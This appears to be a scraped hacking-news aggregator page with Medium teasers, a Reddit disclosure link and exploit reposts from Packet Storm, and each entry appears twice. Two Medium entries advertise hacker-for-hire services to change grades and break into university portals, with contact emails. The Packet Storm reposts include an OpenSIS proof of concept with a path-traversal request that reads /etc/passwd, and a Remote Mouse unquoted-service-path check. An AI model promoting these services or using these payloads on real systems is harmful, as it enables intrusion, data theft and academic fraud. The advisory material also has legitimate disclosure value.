Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HOW TO HIRE A HACKER TO CHANGE GRADES
https://cdn-images-1.medium.com/max/620/1*nwvEsegMTGhYVsjD0AABEA.jpeg
CONTACT US ON MAGICFINGERHACKERS@GMAIL.COM on any hacking relating issues.
Continue reading on Medium »
HOW TO HIRE A HACKER TO CHANGE GRADES
https://cdn-images-1.medium.com/max/620/1*nwvEsegMTGhYVsjD0AABEA.jpeg
CONTACT US ON MAGICFINGERHACKERS@GMAIL.COM on any hacking relating issues.
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HOW TO HACK UNIVERSITY PORTAL AND DATABASE
https://cdn-images-1.medium.com/max/660/1*RAaiZezDRj0NT6viJNverA.jpeg
REDEMPTIONHACKERSCREW@GMAIL.COM — — PROFESSIONALLY KNOWN FOR UNIVERSITY PORTAL HACK.
Continue reading on Medium »
HOW TO HACK UNIVERSITY PORTAL AND DATABASE
https://cdn-images-1.medium.com/max/660/1*RAaiZezDRj0NT6viJNverA.jpeg
REDEMPTIONHACKERSCREW@GMAIL.COM — — PROFESSIONALLY KNOWN FOR UNIVERSITY PORTAL HACK.
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
My Facebook recently got hacked and how I got it back
https://cdn-images-1.medium.com/max/720/1*bxehhxBfHycu1bFR6aFyGQ.png
I’ve been using Facebook since past 8 or 10 years as long as I can remember. And during such a long period, I’ve had various security…
Continue reading on Medium »
My Facebook recently got hacked and how I got it back
https://cdn-images-1.medium.com/max/720/1*bxehhxBfHycu1bFR6aFyGQ.png
I’ve been using Facebook since past 8 or 10 years as long as I can remember. And during such a long period, I’ve had various security…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
NCIIPC — Responsible Vulnerability Disclosure Program
https://cdn-images-1.medium.com/max/1071/1*ohaYchHYmGRuOrryVvxbaA.jpeg
NCIIPC stands for National Critical Information Infrastructure Protection Center.
Continue reading on Medium »
NCIIPC — Responsible Vulnerability Disclosure Program
https://cdn-images-1.medium.com/max/1071/1*ohaYchHYmGRuOrryVvxbaA.jpeg
NCIIPC stands for National Critical Information Infrastructure Protection Center.
Continue reading on Medium »
WDAG can be closed by redirecting to URL with long host name
https://www.reddit.com/r/redteamsec/comments/phax3s/wdag_can_be_closed_by_redirecting_to_url_with/
submitted by /u/Jdgregson (https://www.reddit.com/user/Jdgregson)
[link] (https://github.com/jdgregson/Disclosures/tree/master/microsoft/wdag-dos-long-hostname) [comments] (https://www.reddit.com/r/redteamsec/comments/phax3s/wdag_can_be_closed_by_redirecting_to_url_with/)
https://www.reddit.com/r/redteamsec/comments/phax3s/wdag_can_be_closed_by_redirecting_to_url_with/
submitted by /u/Jdgregson (https://www.reddit.com/user/Jdgregson)
[link] (https://github.com/jdgregson/Disclosures/tree/master/microsoft/wdag-dos-long-hostname) [comments] (https://www.reddit.com/r/redteamsec/comments/phax3s/wdag_can_be_closed_by_redirecting_to_url_with/)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Remote Mouse 4.002 Unquoted Service Path
https://4.bp.blogspot.com/-Lnl-ZxRP9Iw/WWlvEVwqA2I/AAAAAAAAIK8/WG2BCM3S_lsUOouuCwhP5sp3j7hYzeO-wCLcBGAs/s1600/h133.png
Remote Mouse version 4.002 suffers from an unquoted service path vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Remote Mouse 4.002 Unquoted Service Path
https://4.bp.blogspot.com/-Lnl-ZxRP9Iw/WWlvEVwqA2I/AAAAAAAAIK8/WG2BCM3S_lsUOouuCwhP5sp3j7hYzeO-wCLcBGAs/s1600/h133.png
Remote Mouse version 4.002 suffers from an unquoted service path vulnerability.
MD5 |
1a0690ef5839f55c744ed5a73d3fb409Download
# Exploit Title: Remote Mouse 4.002 - Unquoted Service Path
# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io)
# Date: 03.09.2021
# Software Link: https://www.remotemouse.net/downloads/RemoteMouse.exe
# Vendor Homepage: https://www.remotemouse.net/
# Version: Remote Mouse 3.008 & 4.002
# Tested on: Windows 10
# Proof of Concept:
C:\Users\death>sc qc RemoteMouseService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RemoteMouseService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : RemoteMouseService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
RemoteMouseService RemoteMouseService C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe Auto
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
BRAKTOOTH: Causing Havoc On Bluetooth Link Manager
https://3.bp.blogspot.com/-5Gol6ncjvHU/WWlu6JXhP1I/AAAAAAAAIJU/-rw4_xI3A9E9PcOGmPlkULl4C62j1nBBwCLcBGAs/s1600/h108.png
This whitepaper discusses BRAKTOOTH, a family of new security vulnerabilities in commercial BT stacks that range from denial of service (DoS) via firmware crashes and deadlocks in commodity hardware to arbitrary code execution (ACE) in certain IoTs.
MD5 |
Download
Source:packetstormsecurity.com
BRAKTOOTH: Causing Havoc On Bluetooth Link Manager
https://3.bp.blogspot.com/-5Gol6ncjvHU/WWlu6JXhP1I/AAAAAAAAIJU/-rw4_xI3A9E9PcOGmPlkULl4C62j1nBBwCLcBGAs/s1600/h108.png
This whitepaper discusses BRAKTOOTH, a family of new security vulnerabilities in commercial BT stacks that range from denial of service (DoS) via firmware crashes and deadlocks in commodity hardware to arbitrary code execution (ACE) in certain IoTs.
MD5 |
83e56767b319b5f79741b2ed5ec789faDownload
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
SQLMAP - Automatic SQL Injection Tool 1.5.9
https://1.bp.blogspot.com/-9u0QXe9ybeo/WWlvU_DnejI/AAAAAAAAIN0/BUl-HrIsuwE3sKywG67Nuv_wLRABID6oQCLcBGAs/s1600/h45.png
sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.
MD5 |
Download
Source:packetstormsecurity.com
SQLMAP - Automatic SQL Injection Tool 1.5.9
https://1.bp.blogspot.com/-9u0QXe9ybeo/WWlvU_DnejI/AAAAAAAAIN0/BUl-HrIsuwE3sKywG67Nuv_wLRABID6oQCLcBGAs/s1600/h45.png
sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.
MD5 |
32819398c46317bb918049666fad4e8fDownload
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
OpenSIS 8.0 Directory Traversal
https://1.bp.blogspot.com/-ju6c7E-5MWk/WWlvdc1QT-I/AAAAAAAAIPk/ByEXv5vo16UsrlpTJMmF2Op4hfJEgrRpQCLcBGAs/s1600/h79.png
OpenSIS version 8.0 suffers from a local file inclusion vulnerability via a path traversal.
MD5 |
Download
Source:packetstormsecurity.com
OpenSIS 8.0 Directory Traversal
https://1.bp.blogspot.com/-ju6c7E-5MWk/WWlvdc1QT-I/AAAAAAAAIPk/ByEXv5vo16UsrlpTJMmF2Op4hfJEgrRpQCLcBGAs/s1600/h79.png
OpenSIS version 8.0 suffers from a local file inclusion vulnerability via a path traversal.
MD5 |
b5b5159ba7f41f0e12e980bac421c26dDownload
# Exploit Title: OpenSIS 8.0 'modname' - Directory/Path Traversal
# Date: 09-02-2021
# Exploit Author: Eric Salario
# Vendor Homepage: http://www.os4ed.com/
# Software Link: https://opensis.com/download
# Version: 8.0
# Tested on: Windows, Linux
The 'modname' parameter in the 'Modules.php' is vulnerable to local file inclusion vulnerability. This vulnerability can be exploited to expose sensitive information from arbitrary files in the underlying system.
To exploit the vulnerability, someone must login as the "Parent" user, navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php. The 'modname' parameter and requests the Portal.php's contents. By going back a few directory using '..%2f' decoded as '../' it was possible to disclose arbitrary file from the server's filesystem as long as the application has access to the file.
1. Login as "Parent"
2. Open a web proxy such as BurpSuite and capture the requests
3. Navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login=
4. Check the response
PoC: https://youtu.be/wFwlbXANRCo
Source:packetstormsecurity.com